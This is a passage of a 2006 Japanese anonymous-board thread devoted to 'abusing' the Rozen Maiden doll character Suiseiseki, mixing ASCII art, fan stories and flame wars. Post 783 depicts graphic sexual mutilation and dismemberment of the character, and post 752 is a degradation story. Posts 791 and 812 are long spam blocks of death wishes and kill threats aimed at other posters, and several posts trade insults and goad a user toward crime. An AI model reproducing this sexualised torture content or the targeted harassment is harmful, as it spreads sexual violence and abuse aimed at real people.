   タ    /:::/:/:.!::::::l:::::l   逃げるですぅ
      _∠ニフ': : : :.',::::::l:::::l
   r┬':仁二): : : : : : :Y二二)
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
.   /    

748 :名無しかわいいよ名無し:2006/03/14(火) 16:37:09 ID:diRph1F/
14(火) 16:33:54 ID:b2iMUuiF
              _ -- 、
     ス        入    _>
     タ        /:::/トイ::::|
    タ      /:::/:::|::::|:::::|
   タ     /:::/:::;イ:::::l:::::|
   タ    /:::/:/:.!::::::l:::::l   やっぱり戻ってきたですぅ
      _∠ニフ': : : :.',::::::l:::::l
   r┬':仁二): : : : : : :Y二二)
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
.   /    

749 :名無しかわいいよ名無し:2006/03/14(火) 16:57:04 ID:pXnNv9fc
じゃあブッコロだな

750 :名無しかわいいよ名無し:2006/03/14(火) 18:06:16 ID:chO+NRRG
>>737
さっき読んでみたけど全部コピペの改変だよ
それもコピペ大辞典ののってるような結構有名なやつ

751 :名無しかわいいよ名無し:2006/03/14(火) 19:17:29 ID:diRph1F/
      く/',二二ヽ>
       |l |ノノイハ))  
       |l |リ≧∀≦ノl| バッチコーイですぅ!     
      ノl⊂l_介」つ 
.      /ノ>、,.<ヽ\ 
.      `<_/ |. ヽ_ン'  
        ∪∪
        ‖‖
       ε  З 

752 :名無しかわいいよ名無し:2006/03/14(火) 19:22:19 ID:uQbVZm8z
桜田家の納戸にうずくまる翠星石

「ううう...おなか...すいたですぅ。もう何日も食べてないですぅ。
 外に出たくても両足を砕かれて立てないからドアまで手がとどかないのですぅ」

(納戸のドアが開く)
「!あ、開いたですぅ!外に出るですぅ!」
そう言ってドアのところまで、はいずって行く翠星石。その翠星石を踏みつけて入ってくるジュン。
「ぐえっ!」
「...ん?今なんか踏んだような?」
「う...ひ、ひどいですぅ」
「空耳かな?翠星石、なんか聞いたかい?」
「いえ...何も...聞こえなかった...です」
「?!い、今の声は?翠星石は返事なんてしてないですよ?誰がジュンに返事をしたです?」
疑問に思った翠星石は空腹でかすんだ目でジュンを見上げる。
ジュンは左腕に抱き上げたドールに親しげに話しかけていた。
「そ、そいつは?!ジュ、ジュン!そいつは翠星石じゃないのです、目を覚ませですよ!!」
「今なんか聞こえたかい?薔薇水...せいせき?」
「いいえ...何も聞こえません...です...お父さ...まスター」

「な?なぜコンチクショウがジュンと?!みんな、どうしてコンチクショウを家に入れたですか?」
「ん?何だ?なんか緑色のボロ雑巾が喚いているような?」
「お父さ...マスター...これは後で薔薇水..せいせきが片付けておきます」
「ん?そうか、いや〜最近翠星石がすっかり素直で良い子になったって姉ちゃんや真紅たちにも評判なんだよ」
「嬉しい...です...ぅ」

「待つですぅ!な、な〜にを言ってやがるですかチビ人間!若いのに近眼が老眼に進展したですか!
 そいつは翠星石じゃないですぅ!薔薇水晶のコンチクショウですぅ!」
「あ?お前みたいな口の悪い薄汚い緑の雑巾がローゼンメイデンのわけないだろ?
 ホンモノはこの薔薇す...い星石だ。な?そうだろ」
「はい...なの...です」
「そ、そんな、です!」
「ふん、お前はコレでも食ってろ」
とジュンはそれまでクチャクチャ噛んでいたチューインガムをペッと翠星石の目の前に吐き出した。
「あ...」
翠星石の目の前の床にはガムが湯気をたてて貼りついていた。
あまりに空腹だった翠星石は吐き捨てたガムをニューっと、つまんで口に入れた。
「ふん、汚ねぇ奴だ。いこう薔薇...水せい石、姉ちゃんがオヤツだってさ」
「はい...です...参りましょう..おと...マスター...です」
(納戸のドアを閉め出て行くジュン)
納戸の中に残された翠星石
「もったいないですぅ(クチャクチャ)まだ甘みが残っているのですぅ(ジュルル)
 ジュンの唾液入りのガムです...おいしいのですぅ」

堕ちるとこまで堕ちた翠星石だった。
おわり。




753 :名無しかわいいよ名無し:2006/03/14(火) 19:33:16 ID:BdHLUiRm
>>751
あれほど言ったのにまだそんなレスするですか!!!!!!!!!!
このスレッドもあんたのレスも最低最悪です、反吐が出るですぅ。 不思議なくらいですぅ。
レスする前に考えたですか? 反応ないかな、とか、
最悪かな?とか。それなのにレスしたとしたら、

あんたセンス史上最悪ですぅ。

それとも、やっぱり何も考えることのできねークズ人間なんですか?
文面からわかるですけど、何も考えてねーんですよね?
でも、ちったぁ考えろですぅ、あんたがしたこの最悪なクソレスを
読まされちまった人達の迷惑を。 せっかく楽しく掲示板を読もうとしたのに、
こんな話を読まされちまって興ざめですぅ。
もう、すっかりやる気なくなっちまったですぅ。
あんたのネタなんかブラクラや死体画像以下なんだから、
もう二度と書き込むなよダメ人間ですぅ。

754 :名無しかわいいよ名無し:2006/03/14(火) 20:01:35 ID:pAaUG+tS
>>753
翠星石虐待スレにようこそ。

なりきりの人かな?
このスレの本旨は翠星石を虐待することだから、
他のなりきりスレみたいに虐待な書き込みに反撃したり切り返すのは厳禁だ。
もちろん翠星石が虐待者に勝つSSも書きこまないでくれたまえ。
翠星石になりきるならば虐待や虐殺をあまんじて受けること。

みなの期待を裏切らないように苦しみ悶えて、

ここを楽しみにしてるみんなに迷惑かけないように、と言ったのは君だからね。

ではよろしくw

755 :名無しかわいいよ名無し:2006/03/14(火) 20:11:50 ID:RKf/eUPm
勘違いした低能が自演でマンセー、あげくにスレの一切を取り仕切ろうとする。ショボいSSスレでよく見掛ける光景だよな。

756 :名無しかわいいよ名無し:2006/03/14(火) 20:35:18 ID:qcyBbY9i
いやな光景だ

757 :名無しかわいいよ名無し:2006/03/14(火) 21:00:01 ID:iCt183sO
嫌なら見なけりゃいいことなのにいちいちいちゃもんつけるのは何とも見苦しいな。

758 :名無しかわいいよ名無し:2006/03/14(火) 21:01:56 ID:diRph1F/
>>752
                          ___    .∞ 〜
                        く/',二二ヽ>
                      ν⌒,,ζl |ノノイハ)) ガムうめーですぅ・・・
                    ⊂_:#:≦|#:;)〜T#)ニチャニチャ



759 :名無しかわいいよ名無し:2006/03/14(火) 21:05:10 ID:bbnOnGK2
薔薇翠星石とお父さマスターワロスw
棒読みだから妙にハマりそうだな

760 :名無しかわいいよ名無し:2006/03/14(火) 21:23:07 ID:RKf/eUPm
「嫌なら見るな」
厨が多用するお定まりのレスだわな。
不特定多数の人間が利用する掲示板において、そんな言い訳が成り立つとでも思っとるのかね?実にお目出たい。

そもそも今俺がやってるのは、しょーもない事をしてるお前に対する人格攻撃な訳で。
嫌なら見るなーなんて反論は、明らかにお門違いな訳。
わかった?クズ人間さん。

761 :名無しかわいいよ名無し:2006/03/14(火) 21:29:01 ID:52hztaAP
クズはてめえ↑ ダヨ! 氏ねよ
ダレも言い訳なんて陳腐なこたぁしねーよ。ホントに翠がムカツクだけ。
それ以上にてめーみてえな自治厨。本気でクタバレ!や。
人格攻撃?ハァ?幾らそんなことしたところでこのスレが潰れるわけでもない。

762 :名無しかわいいよ名無し:2006/03/14(火) 21:34:42 ID:RKf/eUPm
なにそのマジレス。

763 :名無しかわいいよ名無し:2006/03/14(火) 21:35:21 ID:jhfmdscz
>>760
いや、成り立つだろ
いちいち気に入らないサイト荒らしてたらネット出来ないぞ
嫌なものを見たらスルー
ネットの鉄則

764 :名無しかわいいよ名無し:2006/03/14(火) 21:36:50 ID:jhfmdscz
736 名前:名無しかわいいよ名無し[sage] 投稿日:2006/03/14(火) 09:24:43 ID:iCt183sO
レイプショーだよ

744 名前:名無しかわいいよ名無し[sage] 投稿日:2006/03/14(火) 15:38:32 ID:iCt183sO
ディードって誰よ

757 名前:名無しかわいいよ名無し[sage] 投稿日:2006/03/14(火) 21:00:01 ID:iCt183sO
嫌なら見なけりゃいいことなのにいちいちいちゃもんつけるのは何とも見苦しいな。


それにしてもたったこれだけしかID:iCt183sOはレスしてないのに、
よく人格攻撃だとか言えるよ

765 :名無しかわいいよ名無し:2006/03/14(火) 21:42:41 ID:RKf/eUPm
えぇ!?スッゲーなおい。
俺が誰を相手にしていると?
なんでそんなに読解力が欠落してるかなあ?

766 :名無しかわいいよ名無し:2006/03/14(火) 21:44:22 ID:52hztaAP
ハァ?まだいたの?真性おばかさぁんだわ はやく立ち去れ。氏ね。
せいぜいこのスレの住人全員に対する人格攻撃でガムヴァレや、プゲラ

767 :名無しかわいいよ名無し:2006/03/14(火) 21:44:39 ID:jhfmdscz
>>765
お前は>>757にレスしたわけだろ
で、「お前に対する人格攻撃」だから、お前が人格攻撃してるのは複数じゃなく一人ということになる
ということはお前が人格攻撃してるのは>>757だと思ったんだけど、違った?

768 :名無しかわいいよ名無し:2006/03/14(火) 21:46:01 ID:52hztaAP
もしかしてお前ID:RKf/eUPm、ク ソ ミ ド リ 好 き な の か ?
おまえの目の前でユージン翠をメチャメチャに破壊してやろうか?ww


769 :名無しかわいいよ名無し:2006/03/14(火) 21:49:37 ID:52hztaAP
翠星石萌えるよ翠星石なんてほざいている奴ら全員氏ねよw
あんなクソミドリはゴミドール 燃えないゴミと一緒に出しましょう。
リサイクルが利かない分、産業廃棄物並みの悪質なゴミになる。
ハンマーで粉々に粉砕して夢の島へ直行便

770 :名無しかわいいよ名無し:2006/03/14(火) 21:49:41 ID:RKf/eUPm
単語を適当に並べただけの駄文をSSと呼べるのか?マジで?

771 :名無しかわいいよ名無し:2006/03/14(火) 21:51:20 ID:52hztaAP
このスレ全部読んでから言えや。全部読む気もねえくせに ほ ざ く な よ !w
不快感感じるんなら読めねーだろうなあ

772 :名無しかわいいよ名無し:2006/03/14(火) 21:52:18 ID:RKf/eUPm
なんていうか・・・相手の意図を読み取れないっていうのは哀れな事だよな。同情する。

773 :名無しかわいいよ名無し:2006/03/14(火) 21:56:26 ID:QtrFXUV9
         \  /:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:.:.l:.:\ ヽ \
          ヽ/:.:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:/:./:/:.:.:.:.!ヽ ヽlヽ
            /:.:.:.:|:.:./:.:.:.:.:.:.:.:.:.:.:///:.:l:.:.:.:|:.:ヽ / l
.           |:.:.:.:..|ィ‐_-_、_. -///;ハ:.:|:.:.:.:!:.:.:.V   l
.           |l:.:.:.:.N r‐ァ-、` ̄  メ/‐-ヽ|、:.:|:.:.:.:|   _」
            ハ:.:.:.:l  弋:ソ  /´ ィ=‐、、\/:.:.:./-r ´
          /:.li \_\      ,   弋:ソ '´/:.:.:./:.:.:.l
.      __ /:.:.li   il、   , -- ‐、   _/:.:./:.:.:.:.:.!
     /´‐-、ト,:./:li ※ il:.:\ {__   }  ア ̄/l:.:.:.:.:.:l:.l   ケンカはやめやがれですーッ!!!
.   /  ‐-〈//li  il:.:.:.:.:.> 二ニ´ィ:li ※〃:.l:.:.:.:.:.:.l:l
   l  `ニ7'´: :.li   il ̄ ̄ _\ノヽ._l:li   il-lユ‐_-、:.:!l
  r‐l   |フ!: : にli  il〃 ̄  ィトK\  li  ilこ|ー‐  |:.:.:.l
  |〉l  イ _): :.にli※/ \///)l:l l:l ヽli. ilこ!|二  /:.:.:.:.:!
/>にLイ<:.:にli /´     //(!|:| L!==li※!こl./  /!:.:.:.:.:.:.l
丁L__|ーLノ:.:.:.にX      // )!|:|   ハ ilこ! l  /ヽl:.:.:.:.:.:.:l


774 :名無しかわいいよ名無し:2006/03/14(火) 21:56:56 ID:RKf/eUPm
句読点すらまともに使えてない厨が、職人面してのさばってるのはほんとに不快。
結局その手のアフォは自制心の欠けらも無く、こうして自らスレを荒らす次第。

775 :名無しかわいいよ名無し:2006/03/14(火) 22:07:20 ID:RKf/eUPm
もう逃げちゃったの?

776 :名無しかわいいよ名無し:2006/03/14(火) 22:08:03 ID:fyou1T8Y
厨房の>>754。元気ですぅか?
頭も声も財布の中身も消防と大して変わんねーくせに、
身体とアソコばっかりでっかくなって、
部屋に引きこもって掲示板に生意気な書き込みしてるあんたが、
超うざくて私は大嫌いなんですぅ。
どんなに大人ぶって書き込みしても、
1行読んだだけで「>>754だな」って私にはわかるんですぅ。
だってあんたはそこに居るだけの生きる屍みたいな存在ですぅから。
薄っぺらでバレバレですぅ。
休みにお金がなくて暇ですぅか?
何か事件でも起こしてみたらどーですぅ。人を殺したりするんじゃねえ、
世の中のダメ人間どもがびっくりしやがるくらいでけーことやってみるがいいですぅ。
どうせ、できるわきゃないですぅけど。

777 :名無しかわいいよ名無し:2006/03/14(火) 22:18:49 ID:pAaUG+tS
ま、虐待職人のみんなが書き込まないのは、
単に翠虐待のかぎりをつくしすぎて、ネタが無くなっただけで、
少なくとも、この翠なりきりのせいではないことは確かなんだがなw


778 :名無しかわいいよ名無し:2006/03/14(火) 22:27:42 ID:iCt183sO
というかこの雰囲気では描きづらい。
前みたいに書き込みがほとんどなく、賞賛ばかりだった時代に戻りたいよ。

779 :名無しかわいいよ名無し:2006/03/14(火) 22:42:49 ID:52hztaAP
>>775 はいはいかまってちゃんw こちとら色々仕事あんのよ、
いちいち君のような正義感ぶって厨のあいてばっかしてらんないのw
逃げるもくそも、常駐ぶってるほうがキモイでしょ
いい加減弄ばれてンのはキミのほうだって気がつきなゴルァ

780 :名無しかわいいよ名無し:2006/03/14(火) 23:16:58 ID:EieU4RSM
おまいら
痛いカキコはスルーすれば良いじゃん。
嫌いなssもスルーすれば済むことだし、このスレ自体に不満があるなら出ていけば良い。
てかどっちに非があろうと叩き合いとかヤメレ
正直見苦しい。


↓そして何事もなかったかのようにミドリ虐待再開

781 :名無しかわいいよ名無し:2006/03/14(火) 23:28:10 ID:pAaUG+tS
>>752
乙。
ソフト系かと思ったら、冒頭ですでに足砕いてあったのかw
薔薇翠星石、確かに素直そうで糞ミドリより受けがいいだろうなw


よし、この続編今思いついた!

「ジュンの使用済みティッシュですぅ。これで貴重なタンパク源をゲットですぅ(クチャクチャ)
イカ臭くて、おいしいのですぅ」

おわり

782 :名無しかわいいよ名無し:2006/03/14(火) 23:43:05 ID:RKf/eUPm
一応、自分が弄ばれてるっていう自覚はあったんだね♥

783 :名無しかわいいよ名無し:2006/03/15(水) 00:11:24 ID:O2pplcfO
久々に叩き潰すか

「翠星石よぉ、お前人が真面目になろうってのに邪魔しやがって。ふざけてんのか?」
デュードは刀を片手に翠星石に攻め寄った。
「何言うですか!翠星石はデュードのためを思ってスコーンを毎日作ってやったですよ!感謝のお礼くらい言って欲しいもんです!」
胸を張って誇張する翠星石。
「ああ?あんな糞不味いもん食えるかよチンカス。ジャム入れるなんて脳みそ腐ってんじゃねえのか?」
「え?翠星石の調理が拙かったですか・・・。ごめんなさいです・・・」
しょんぼりして謝る翠星石。
「まあそれはいいとして、お前あのスコーンの中に変なもん入れやがっただろ。昨日からナニが痒いし、膿んでるしで酷い有り様だ。どうしてくれんだ糞人形よ?」
そう言ってデュードはズボンのチャックを下ろし、イチモツを翠星石の目の前に押し付けた。
「いやぁ!そ、そ、そ、そんなもの見せるなですぅ!さっさとしまえですぅ!」
顔を真っ赤にしながら後ろを向く翠星石。
そんな態度の翠星石にデュードはキレる寸前だった。
「お前のせいでこんな目にあったんだろうが!さっさと人工精霊とやらで治しやがれ!」
「む、無理ですぅ・・・スィドリームにものを治す力はないですぅ・・・」
翠星石は怯えていた。
「そうか。なら仕方ねえ。お前の性器も潰させてもらうぜ!」
そう言うとデュードは翠星石に掴みかかり、スカートを剥ぎ取り、中の下着も破り、性器の部分を露出させた。
「いやあ!み、見るなですぅ!お願いですぅ!」
「綺麗な形してるじゃねえか!」
その割れ目に鋏をねじ込んだ。
「ぎいいやあああああ!痛いですぅ!抜いて!早く抜いてぇ!」
「このくらいで済むかよ!クイは打ち込まないとな!」
デュードはハンマーを取り出すと、その鋏に向かって思いっきり叩きつけた。
「う!っぐ!っぎえ!」
打ち込むたびに翠星石が声を上げる!完全に奥まで入ったことを確認するとそこでハンマーはストップした。
翠星石はぐったりとしている。
「へっへっへ、まだ終わらねえぜ!」
今度はスコーンを持ち出し、翠星石の口に無理矢理ねじ込んだ。
「おら食え!お前が昨日俺に食わせたやつだ!さぞ美味いだろうなあ!お前豪語してたからなあ!」
「ん・・・ぐ・・・!は!飲んじまったですぅ!ああ!股間が痒いですぅ!」
足をバタつかせて暴れる翠星石の下半身をデュードはサイズ(大鎌)で切断し、蹴り飛ばした。
「ぎゃあああ!翠星石の足があぁぁああああ!!!」
「使えないマンコと足なんていらねえだろうが!切り捨てちまえ!」
そして翠星石の目の前にスコーンを一個投げ捨てるとデュードはトレーラーハウスに戻っていった。
「うう、なんとも貧相な昼食ですぅ・・・」
そう言ってそのスコーンを食べた。すると
「うげぇええ!ふやけてる上に尿の味がするですぅ!」
と、次の瞬間上からスレッジが落ちてきた翠星石の頭は叩き潰された。

The End

784 :名無しかわいいよ名無し:2006/03/15(水) 01:19:13 ID:aorK65ff
イイヨイイヨー

785 :名無しかわいいよ名無し:2006/03/15(水) 03:02:38 ID:uLYIYtmt
>>783
こーんな駄レスをした>>が被告となっている裁判を傍聴してきたですぅ。
法廷に姿を表した被告は、判事が現れるまで,リラックスして,自信たっぷりに見えたですぅ.
判事の入廷を待つ間,笑顔を浮かべやがりながら家族や傍聴人,私にも手を振って合図しやがったですぅ.
ですけど,弁護団の1人の弁護士が通路を横切って握手しようとしやがって,
用心深い執行官が止めに入った時,ようやく幻想が打ち砕かれたのです.
彼は薄汚いダメダメヒッキー人間で,一般社会とその習慣から隔絶されていやがるのですぅ.
やがて判事が入廷したですぅ.
その後の約1時間にわたる審理が半分くらい進んだとこで,
容疑事実の確認を求められた被告は「ソース出せゴルァ」
と応えやがって、全く反省の様子はねーかったですぅ。
裁判官に激しく叱責された被告は「削除依頼を出しておいたからな」
と、このときばかりは弱気になったです、いい気味ですぅ。
彼は法廷から連れ出される時,両手首を鎖で腰に繋がれたまま,
笑顔を浮かべて判事のほうに向かい,「逝ってヨシ!」と言ったですぅが,
判事は反応しねーかったですぅ.
次の審理は今月27日に行われる予定ですぅ.

786 :名無しかわいいよ名無し:2006/03/15(水) 04:45:17 ID:Pquhp0Fn
もうちょいこう、なんというか
好きな子に限っていじめる小学生みたいなさ
愛のあるソフトないじめSSが読みたいんだけど

787 :名無しかわいいよ名無し:2006/03/15(水) 05:54:28 ID:zYUjCcji
きちんとした状況説明や、殺す側が虐殺という選択肢を選ぶに至る過程の描写が無いんだよね。あまりに脈絡無さ過ぎて呆気にとられるよ。
『僕殺す人ー。私殺される人ー。はい、今回はこんな風にして殺しましたー』
これのどこが面白いのかと。


788 :名無しかわいいよ名無し:2006/03/15(水) 06:05:01 ID:zYUjCcji
そもそも、コレ書いてる人はキャラへの愛なんか持ってないでしょ?
殺す側の人物に自分を投影して、キャラに対する欝憤を晴らしてるだけ。これ>>785を見ればその事は一目瞭然。
自己満オナニー作文も程々にしなさいよ、と言いたい。

789 :名無しかわいいよ名無し:2006/03/15(水) 06:16:20 ID:uLYIYtmt
じゃあお前が書けば?

790 :名無しかわいいよ名無し:2006/03/15(水) 07:01:37 ID:RXtYobAk
愛があろうとなかろうとはい僕殺す人ーだろうと一向に構わんのですが何か?
こちとら暇つぶし程度に2chきてんだから。
つーかそこまで言うならおめーが単語を並べただけではなくて
虐待に至る心理描写が太宰にも劣らない様な、胸がキリキリするほど上手いすんばらしいの書けよ?^^

791 :名無しかわいいよ名無し:2006/03/15(水) 08:26:02 ID:AQn+XhI5
テメーうぜぇですぅマジでテメーウゼーですぅゲンナリクソファッキンヤローですぅ
死ねよですぅ本気で死ねマジ死ぬよですぅウゼー殺されろですぅカスは宇宙のガンですぅ死ねですぅマジ殺してぇですぅ死ねサノバビッチですぅ
死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ね死ね死ね死ね死ねボケッですぅ
てめえマジうぜえですぅ本気でうぜえですぅ死ね人間のクズですぅ死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカス留年ゼッテー殺すですぅテメー絶対“あんた死ぬわよ”ですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼー殺されろカスですぅ人類のゴミですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ
糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ
死ねですぅキモイですぅ死ねですぅウザイですぅ消えろですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ
珍走団の方がマシですぅウザイですぅキモイですぅ消え去れですぅ死ねですぅ死ねですぅ死ねですぅボケッですぅマジキモイですぅ
死ねですぅ死ねですぅ死ねですぅ死ねですぅ
殺されろですぅ私はメイドじゃねーつってんだろですぅカスですぅてめーみてーなDQNは世界の産業廃棄物ですぅ
死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケですぅ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカスですぅゴキブリですぅゼッテー殺すですぅテメーうぜぇですぅマジでテメーウゼーですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼーですぅ
殺されろですぅカスですぅ本気で消えてくれですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ糞野郎ですぅ
あーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ
人類のゴミ死ねですぅ死ねですぅカスボケキチガイキモヲタニート留年死ねよですぅテメェキモイんだよこのゴミが絶対死ねですぅ
うぜぇマジうぜぇですぅ死ねボケカスですぅゼッテー殺すですぅクズ宇宙のガンですぅマジ死ねよですぅニートオタッキーは逝ってよしですぅ
死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ死ねですぅ死ねですぅ死ねですぅボケッキチガイ糞厨キモヲタニートですぅ
マジで死ねですぅキモイですぅ本気で消えてくれですぅ殺されろですぅカスですぅ消え去れですぅうぜえですぅ死ねですぅ死ねですぅ
DQNですぅマジ殺してぇですぅ死ねですぅカスボケニートオタッキーは殺されろですぅカスですぅ
絶対死ねですぅキモイですぅうぜぇですぅマジうぜぇですぅ死ねですぅボケカスゼッテー殺すですぅテメー絶対殺してやるですぅ
キチガイ糞厨キモヲタニートはゴキブリでも食って死ねですぅ

792 :名無しかわいいよ名無し:2006/03/15(水) 08:30:56 ID:PH+8zqB0
 ,---------------------、
/____[__///_]____/ ヽ 
ヽ、:::::::::::::::::::___::::::::::::::::::::::ヽ  ヽ
  ヽ、::::: く/',二二ヽ>::::::::::::::: ヽ  ヽ
  ///,::: |l |ノノイハ))_____ ヽ/ ガチャ
    /: |∩リ゚ワ゚∩ ::::::::::::::::::::///| おめーらおはよーですぅ
  /::::: ノl_|(l_介」ノ ::::::::::::::::/ .ノ
 ┌─────────.|| ./
 │    [[二二二]]    .|/
 └─────────´

793 :名無しかわいいよ名無し:2006/03/15(水) 12:12:41 ID:PH+8zqB0
      ___  
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |リ゚ ヮ゚ノl| お昼の時間ですぅ何食いましょうか 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 



794 :名無しかわいいよ名無し:2006/03/15(水) 12:30:04 ID:v8pjrJpd
おまえの頭

795 :名無しかわいいよ名無し:2006/03/15(水) 14:24:31 ID:PH+8zqB0
>>194          ___  
           く/',二二ヽ> 
           |l |ノノイハ)) 
            |l |:;)Д。#)l|<・・・ちゃんと残さず食うですよ  
      ,.-''' 、)))))(((()))))(((( ''-.,
     ( ,i''゙)))))(((()))))(((()))))゙'' i,)
     .| ゙-..;;_''  ''''',, '',,,._ ,,,..-'゙.|
      l,     ̄ ̄ ̄ ̄     .|
       'l,             ,/
       \          /
         ゙l'-、..,,,,,,,,,,,,..,、-'l゙
         ゙'-、..,,,,,,,,,,,..、-'゙

     「 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\:─────┐  
     |  薔薇乙女 蕎麦屋.   \.────┤  
     |___________/─────



796 :名無しかわいいよ名無し:2006/03/15(水) 15:03:20 ID:m+ilffDa
                _
               ,'´r==ミ、
         ,_ _ _   卯,iリノ)))〉 _ _ _
       /   `."-|l〉ll.゚ ー゚ノl/    ヽ
      '"'⌒`~"'" ''|!/'i)卯iつ―口ー"``                           グチャ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          (#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚ 
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ( つ つ "〆
     ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵              し(_)←翠星石


797 :名無しかわいいよ名無し:2006/03/15(水) 15:50:27 ID:fU/xrrwa
蕎麦乙女可愛いなあ。

798 :名無しかわいいよ名無し:2006/03/15(水) 15:59:43 ID:PH+8zqB0
      ___   ♪
     く/',二二ヽ>    クスリの
     |l |ノノイハ)) )) 時間ですぅ…
 ((  |l |リ。∀゚ノl|
     ノl⊂l_介」つ0匚l―
    ≦ノ`ヽノヘ≧    
.   ミく二二二〉ミ     


799 :名無しかわいいよ名無し:2006/03/15(水) 16:11:15 ID:y29cctd3
青酸カリのめ。

800 :名無しかわいいよ名無し:2006/03/15(水) 16:32:53 ID:PH+8zqB0
>>799    ___   
     く/',二二ヽ>    
     |l |ノ。イハ))    く、苦しいですぅ…
     |l |リ々゚ノl|
     ノl⊂l_介」⊃
    ≦ノ`ヽノヘ≧    
.   ミく二二二〉ミ       

801 :名無しかわいいよ名無し:2006/03/15(水) 16:42:54 ID:PH+8zqB0
   ___   
  く/',二二ヽ>
,.ζ.l|ノノVイハ)) 誰か・・・助け・・・て
⊂'⌒≦つリ>p<ノ≧つ
   ミ   ミ

802 :名無しかわいいよ名無し:2006/03/15(水) 17:04:58 ID:PH+8zqB0
      ___
     く/',二二ヽ>
    |l |ノ。イハ))
     l∩リ 々゚∩ あぁ・・・ぅう・・・
     ノ弋l_介」ン
    ≦ノ`ヽノヘ≧
.   ミく二二二〉ミ

803 :名無しかわいいよ名無し:2006/03/15(水) 17:47:13 ID:PH+8zqB0
 |─┐ 見ちゃった…
 |ニニ二i                  _     /
 |ノノヽ)))                く    >ヽ, /  オエ〜
 |リ゚ -゚ノリ                 |\ィイl |))〉   ゲロゲロゲロ
 |⊂/                  |||l||l|| l |ノ \   ビチャビチャビチャ
 |/                    ノノ从ヾ,ソ
                     ≦ノ`ヽノヘ≧
                     ミ〈二二二〉ミ_ 

804 :名無しかわいいよ名無し:2006/03/15(水) 18:27:51 ID:xCCvFjMn
         | ̄\|`\                           //ミ /_,. -;=''" _,
         |   \..;´从V∧)                      // '-'"`" -‐ニ‐"___=__--_ __ _ __ ___ _____
        /     ヽW#`Д´) 女の子は殺さない主義だけど/レ    ____-__-__-__=_--_-__=__=_=_=____=__--
      /    ∧/⌒ /     キミだけは許さない!   .,/′ ミ   : =  _-            
     /  /| / /  / \                    ; i:::″  ;ミ  二 __=__--_ __ _ __ ____-__-__-__=
   / __/ / ̄\ \ ̄ ̄三三二二ニ≡≡≡==========lニlll)..!::^:>>翠(ry   三 _ __ _ __ ___ _            
  / / / 〉打撃\__)_/っΕ)_/――――"           !::^:   ミ) ≡ _ __ _ __ _               
/ / ./.∠自由/ .Θ/二二二二二二二ロ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ i:: :: :  ミ    _-__-__-__=_--_-__=_=_=___
|_/  / ../ /二二二二二二二二二二ロ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヽ  ヾ ) ) ヽ_ __ _ __ ___ _____-__-__-__=_--_-__
    |_/./ / /  /~\ \         ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヾ\\:  \,. -;=''" _,.-;-
.     / / /  /    >  )                          \ |\  :: |i''-'"`" -
      .|_./. / ノ   / /                            丶 :: ,. -;=''"
       ./ /   / ./
      / ./    ( ヽ、
      (..ノ      ヽ. ..)


805 :名無しんぼ@お腹いっぱい:2006/03/15(水) 18:36:15 ID:bR3rvaUH
 

806 :名無しんぼ@お腹いっぱい:2006/03/15(水) 18:45:10 ID:RdZPQSJS
 

807 :名無しんぼ@お腹いっぱい:2006/03/15(水) 18:48:38 ID:RdZPQSJS


808 :名無しんぼ@お腹いっぱい:2006/03/15(水) 18:55:03 ID:iLimaGO2


809 :名無しかわいいよ名無し:2006/03/15(水) 18:56:51 ID:q6au4pIC
>>731
このスレでは一週間ぶりのカキコになります
スルーしようかと思いましたが、人違いでそんなことをされてはたまらないので書き込みます
漏れは>>730ではありません

謝罪を求めないとありましたが、あやまります。すみませんでした。ごめんなさい

もうこのスレにくることもないでしょう

最後に
本当に申し訳ありませんでした

810 :名無しんぼ@お腹いっぱい:2006/03/15(水) 18:59:02 ID:iLimaGO2


811 :名無しかわいいよ名無し:2006/03/15(水) 18:59:33 ID:EzD2pW2W
翠星石の体を徐々に蝕んで、破壊するのようなのきぼん。

812 :名無しかわいいよ名無し:2006/03/15(水) 19:32:59 ID:QFMWy8l1
>>811
テメーうぜぇですぅマジでテメーウゼーですぅゲンナリクソファッキンヤローですぅ
死ねよですぅ本気で死ねマジ死ぬよですぅウゼー殺されろですぅカスは宇宙のガンですぅ死ねですぅマジ殺してぇですぅ死ねサノバビッチですぅ
